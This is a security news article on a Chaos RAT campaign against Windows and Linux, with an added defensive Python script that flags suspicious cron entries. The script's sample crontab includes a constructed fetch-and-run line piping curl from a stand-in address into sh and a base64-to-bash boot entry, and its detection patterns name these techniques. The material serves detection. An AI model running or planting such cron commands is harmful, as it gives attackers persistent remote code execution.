Threat hunters are calling attention to a new variant of the remote access trojan (RAT) known as Chaos RAT, which has recently been used in attacks against both Windows and Linux systems. According to findings from the cybersecurity firm Acronis, the malware may have been distributed by luring victims into downloading a supposed network troubleshooting utility for Linux environments, which the attackers then used to gain initial access. Chaos RAT is an open-source RAT written in Go (Golang) that supports both Windows and Linux.
Inspired by offensive security frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel from which operators build custom payloads, establish interactive sessions with infected hosts, and control compromised machines remotely. Work on this “remote administration tool” began in 2017, but it attracted little attention until December 2022, when it was used in a campaign targeting public-facing web applications. Once installed, Chaos RAT connects to an external server and awaits commands, including launching reverse shells and manipulating files on the host.
The attack chains observed by Acronis show that Chaos RAT is distributed primarily through phishing emails containing malicious links or attachments that trick recipients into executing the initial payload. That payload drops a script which modifies the task scheduler to fetch the malware. Analysis of a sample uploaded to VirusTotal from India in January 2025 suggests users are being deceived in exactly this way. The administrative panel used to build payloads and manage infected machines was also found to contain critical vulnerabilities.
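Because the dropper persists by editing the task scheduler to fetch the next stage, a defender's first triage step on a suspected Linux host is to review cron entries for "download and execute" patterns. The script below is an added example written for this article, not code from Acronis or from the Chaos RAT project: it parses crontab text and flags entries that pipe curl/wget output into a shell, write a download to disk and run it, or decode an embedded base64 blob into a shell. The crontab content, the `198.51.100.23` address (a documentation range) and the `nettool.sh` filename are all constructed for the example and are not indicators from the campaign.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not from any real infection): one comment,
# two benign jobs, one job that fetches and runs a remote script, and one
# that decodes an embedded base64 blob and executes it at boot.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update -q
*/5 * * * * curl -fsSL http://198.51.100.23/nettool.sh | sh
@reboot echo ZWNobyBoaQ== | base64 -d | bash
30 4 * * 0 /usr/local/bin/backup.sh --full
"""

# Heuristic patterns for scheduled commands that fetch or decode content and
# hand it straight to a shell. They are triage signals, not proof of compromise.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|dash|zsh)\b", "remote fetch piped to a shell"),
    (r"\bwget\b[^;&|]*-O\s*\S+.*(;|&&)\s*(sh|bash|chmod)\b", "wget to disk then execute"),
    (r"\bbase64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b", "base64 decode piped to a shell"),
    (r"\b(sh|bash)\s+-c\s+['\"]?\$\(\s*(curl|wget)\b", "shell -c with inline remote fetch"),
]


def parse_crontab(text: str) -> List[Dict[str, object]]:
    """Split crontab text into entries of schedule + command.

    Comments, blank lines and environment assignments (PATH=...) are skipped.
    '@reboot'-style entries have one schedule field; others have five.
    """
    entries: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry with no command to run
            schedule, command = " ".join(fields[:5]), fields[5]
        entries.append({"line": lineno, "schedule": schedule, "command": command.strip()})
    return entries


def find_suspicious(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the entries whose command matches any SUSPICIOUS_PATTERNS,
    with a 'reasons' list naming every pattern that matched."""
    hits = []
    for entry in entries:
        reasons = [label for pattern, label in SUSPICIOUS_PATTERNS
                   if re.search(pattern, str(entry["command"]), re.IGNORECASE)]
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits


if __name__ == "__main__":
    # On a live host you would feed in the output of `crontab -l` for each user
    # plus the contents of /etc/cron.d; here the constructed sample is used.
    for hit in find_suspicious(parse_crontab(SAMPLE_CRONTAB)):
        print(f"line {hit['line']}: {hit['command']}")
        print(f"    -> {', '.join(hit['reasons'])}")
```

The patterns deliberately key on the combination of "obtain content" and "execute it" rather than on curl or wget alone, so routine jobs that download data without running it are not flagged; extend `SUSPICIOUS_PATTERNS` with the interpreters (python, perl) used in your environment, and apply the same idea to Windows scheduled-task XML, which is the other persistence location the article describes.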
It is not yet clear who is behind the use of Chaos RAT in these attacks. The development once again illustrates how threat actors weaponize open-source tools; using publicly available malware helps advanced persistent threat groups blend into the noise of everyday cybercrime. The activity also coincides with the emergence of a new campaign targeting Trust Wallet users on desktop with counterfeit software. That separate campaign aims to harvest browser credentials, extract data from desktop wallets, and execute arbitrary commands on compromised systems.